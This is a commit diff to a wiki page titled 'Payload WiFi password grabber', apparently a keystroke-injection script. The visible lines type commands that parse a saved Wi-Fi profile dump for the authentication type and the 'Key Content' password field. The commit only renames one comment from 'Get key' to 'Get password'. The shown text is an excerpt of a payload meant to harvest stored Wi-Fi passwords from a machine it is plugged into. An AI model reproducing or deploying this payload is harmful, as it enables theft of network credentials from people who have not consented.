Updated Payload WiFi password grabber (markdown)

This commit is contained in:
Siem Hulscher 2015-10-27 13:56:59 +01:00
parent 4dfc281d61
commit b0e8cbb742
1 changed files with 1 additions and 1 deletions

View File

@ -37,7 +37,7 @@ REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get key
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER